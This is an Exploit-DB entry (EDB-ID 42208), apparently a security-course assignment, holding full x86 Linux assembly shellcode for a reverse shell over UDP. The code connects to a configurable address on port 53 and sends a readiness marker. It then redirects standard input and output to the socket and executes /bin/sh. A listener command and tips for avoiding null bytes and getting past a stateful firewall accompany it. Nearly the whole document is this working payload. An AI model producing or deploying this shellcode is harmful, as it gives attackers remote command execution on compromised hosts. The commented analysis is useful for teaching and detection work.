Linux/x86 - Reverse (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)

EDB-ID:

42208

CVE:

N/A




Platform:

Linux_x86

Date:

2017-06-20


; SLAE-X 
; thanks to write-ups from previous students :] 
; assignment: 2. create a reverse shell  
; originality: using UDP instead of TCP 
; usage : sudo ncat -lup 53 on the receiving end 
; warning: this shellcode may contain null bytes depending on the IP address you use 


; htons(x): swap the two bytes of a 16-bit value so the assembled immediate
; is in network (big-endian) byte order, which is what sin_port expects.
%define htons(x) ((x >> 8) & 0xFF) | ((x & 0xFF) << 8)
%define _port 5353; host-order port, used only by the optional "push word PORT" path in _start (5353 = 0x14E9, no zero byte)
PORT equ htons(_port); assembles to 0xE914

_ip equ 0x0100007F; loopback 127.0.0.1 test; pushed as a little-endian dword the bytes are 7F 00 00 01, two of which are zero
; warning: pick an address whose four bytes are all non-zero, otherwise the encoded "push _ip" below carries null bytes (127.0.0.1 does)
; 127.1.1.1 has issue on UDP fyi   

global _start 

_start: 

;-----------------------------------------------------------------------
; Linux/i386 reverse shell over UDP, int 0x80 interface.
; Flow:  socketcall(SYS_SOCKET)  -> socketcall(SYS_CONNECT) to _ip:53/udp
;        -> socketcall(SYS_SEND) of an 8-byte marker -> dup2 loop onto
;        fds 2,1,0 -> execve("/bin//sh", {"/bin//sh", NULL}, NULL).
; Regs:  eax = syscall number / return value
;        ebx = socketcall sub-function, later oldfd for dup2, later path
;        ecx = pointer to the socketcall argument array built on the stack
;        esi = socket fd, kept live across connect/send/dup2
; Each socketcall argument block is built by pushing its longs in reverse
; order and taking esp, because socketcall(2) receives a pointer to an
; array rather than the arguments themselves.  No return values are
; checked.  This is an injected stub, not a function: stack alignment
; and callee-saved registers are deliberately not honoured.
;-----------------------------------------------------------------------

; we create a socket fd, using again syscall 0x66 and argument SYS_SOCKET so ebx = 1  
push   0x66                    ; eax = 0x66 = socketcall (push imm8 / pop instead of mov eax,imm32, which would carry zero bytes)
pop    eax
push   0x1                     ; ebx = 1 = SYS_SOCKET
pop    ebx
xor    ecx,ecx
push   ecx                     ; args[2] = protocol = 0
; but this times it will be a SOCK_DGRAM UDP, so 0x2 as argument 
push   0x2                     ; args[1] = type = SOCK_DGRAM (2)
push   0x2                     ; args[0] = domain = AF_INET (2)
mov    ecx,esp                 ; ecx -> {AF_INET, SOCK_DGRAM, 0}
int    0x80                    ; eax = new socket fd (or -errno, not checked)
; the fd stays in eax until it is pushed and copied into esi below 

; then we call connect on this UDP socket (to use send()) 
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
; we push ip address as argument 
push _ip; sin_addr = 0x0100007F (127.0.0.1); this 4-byte immediate is where the null bytes come from
xor edx,edx
; port 53 without null byte 
mov dh, 0x35 ; dx = 0x3500 -> bytes 00 35 in memory = htons(53); comment this for variable port 
push dx; sin_port; comment this for variable port 
; push word PORT ; UNcomment this for variable port 
push word 0x2; sin_family = AF_INET; the three pushes lay out family, port, addr exactly as struct sockaddr_in does

mov ecx,esp; ecx -> sockaddr_in; only 8 bytes were pushed, so the sin_zero part covered by addrlen 16 is whatever was already on the stack (the socket() argument array), which the kernel is not expected to interpret for AF_INET — verify if changing the layout
push 0x10; addrlen = 16 = sizeof(struct sockaddr_in)
push ecx; pointer to sockaddr 
push eax; fd received previously 
mov ecx,esp;  ecx -> {fd, &sockaddr, 16}
mov esi,eax; save fd for next call 
xor    eax,eax 
mov    al,0x66                 ; socketcall again
add    bl,0x2                  ; ebx = 1 + 2 = 3 = SYS_CONNECT
int    0x80                    ; connect() on a datagram socket just fixes the peer so send() can be used; result not checked


; now we send a UDP packet to open stateful firewall :] 
xor eax,eax
mov al,0x66 
; ssize_t send(int sockfd, const void *buf, size_t len, int flags);
; we will send "udpready:" string to let the distant server know the shellcode is working and ready   
; note: the bytes actually sent are the 8 characters "udprdy:\n" (see the two pushes), not "udpready:";
; this fixed marker in the first datagram after connect is a stable signature for detection
push 0x0a3a7964                ; bytes 64 79 3A 0A = "dy:\n"
push 0x72706475                ; bytes 75 64 70 72 = "udpr"  -> buffer reads "udprdy:\n"
mov edx,esp                    ; edx -> buffer
; no flags needed 
xor ecx,ecx
push ecx                       ; args[3] = flags = 0
; size of message to be sent is 8 
push 0x8                       ; args[2] = len = 8
push edx                       ; args[1] = buf
push esi                       ; args[0] = fd
mov ecx,esp                    ; ecx -> {fd, buf, 8, 0}
xor ebx,ebx 
mov bl,0x9                     ; ebx = 9 = SYS_SEND
int 0x80                       ; eax = bytes sent (8 on success) or -errno; the "mov al" below assumes the non-negative case

; the rest is similar to assignment 1 > copy pasta

; duplicating fd from socket to stdin stdout stderr of the process 
mov    ebx,esi                 ; dup2(oldfd = socket fd, newfd = ecx)
; ecx still holds the stack pointer handed to send() (e.g. 0xBFFFF39C on the author's run),
; and "mov cl" below writes only the low byte, so clear the whole register first or the loop count is wrong
xor ecx,ecx
mov    cl,0x2                  ; newfd runs 2, 1, 0 (stderr, stdout, stdin)
; we use a loop and decrease cl register, ie from 2 to 0 , 2 - 1 - 0 
loop: 
; syscall dup2 
mov    al,0x3f                 ; eax = 0x3f = dup2; only the low byte is written, so this relies on the previous syscall having returned a small non-negative value (8 from send, then 2/1/0 from dup2) — a negative -errno would leave its upper bytes in eax
int    0x80
dec    ecx
; sign flag is not set if ecx is not inferior to 0 
; so we use "jump if not sign" which check if the flag is on   
jns    loop                    ; repeat while ecx >= 0: iterations for 2, 1, 0; exits once ecx becomes -1

; syscall "execve", with arguments /bin//sh null terminated and a null string for envp argument  
mov    al,0xb                  ; eax = 11 = execve (same low-byte-only assumption: the last dup2 returned 0)
xor esi,esi
push   esi                     ; NUL terminator of the path string
push   0x68732f2f ; "//sh"
push   0x6e69622f ; "/bin"     ; the doubled slash pads the path to exactly 8 bytes so no zero byte is needed inside it
mov    ebx,esp                 ; ebx -> "/bin//sh\0" (filename)
; push null termination 
xor esi,esi
push   esi                     ; argv[1] = NULL; the same slot also serves as the empty envp array
mov    edx,esp                 ; edx -> NULL (envp)
push   ebx                     ; argv[0] = filename
mov    ecx,esp                 ; ecx -> {"/bin//sh", NULL} (argv)
int    0x80                    ; does not return on success; on failure execution continues past the end of the stub